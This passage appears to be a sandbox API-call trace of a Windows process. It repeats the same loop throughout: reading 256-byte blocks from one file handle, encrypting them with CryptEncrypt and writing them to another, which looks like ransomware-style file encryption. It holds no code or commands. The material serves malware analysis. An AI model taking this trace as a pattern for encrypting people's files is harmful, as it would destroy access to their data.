WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.262] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.262] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.262] GetLastError () returned 0x0 [0162.262] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.262] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.262] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.262] GetLastError () returned 0x0 [0162.262] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.262] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.262] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.262] GetLastError () returned 0x0 [0162.262] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.262] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.262] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.262] GetLastError () returned 0x0 [0162.262] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.262] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.262] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.262] GetLastError () returned 0x0 [0162.262] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.262] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.262] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.263] GetLastError () returned 0x0 [0162.263] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.263] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.263] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.263] GetLastError () returned 0x0 [0162.263] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.263] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.263] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.263] GetLastError () returned 0x0 [0162.263] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.263] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.263] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.263] GetLastError () returned 0x0 [0162.263] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.263] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.263] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.263] GetLastError () returned 0x0 [0162.263] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.263] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.263] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.263] GetLastError () returned 0x0 [0162.263] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.263] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.264] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.264] GetLastError () returned 0x0 [0162.264] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.264] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.264] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.264] GetLastError () returned 0x0 [0162.264] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.264] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.264] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.264] GetLastError () returned 0x0 [0162.264] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.264] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.264] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.264] GetLastError () returned 0x0 [0162.264] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.264] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.264] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.264] GetLastError () returned 0x0 [0162.264] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.264] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.264] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.264] GetLastError () returned 0x0 [0162.264] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.264] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.264] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.264] GetLastError () returned 0x0 [0162.264] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.265] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.265] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.265] GetLastError () returned 0x0 [0162.265] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.265] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.265] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.265] GetLastError () returned 0x0 [0162.265] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.265] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.265] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.265] GetLastError () returned 0x0 [0162.265] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.265] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.265] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.265] GetLastError () returned 0x0 [0162.265] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.265] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.265] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.265] GetLastError () returned 0x0 [0162.265] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.265] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.265] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.265] GetLastError () returned 0x0 [0162.265] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.265] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.266] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.266] GetLastError () returned 0x0 [0162.266] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.266] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.266] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.266] GetLastError () returned 0x0 [0162.266] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.266] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.266] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.266] GetLastError () returned 0x0 [0162.266] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.266] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.266] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.266] GetLastError () returned 0x0 [0162.266] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.266] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.266] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.266] GetLastError () returned 0x0 [0162.266] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.266] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.266] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.266] GetLastError () returned 0x0 [0162.266] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.266] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.267] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.267] GetLastError () returned 0x0 [0162.267] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.267] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.267] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.267] GetLastError () returned 0x0 [0162.267] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, 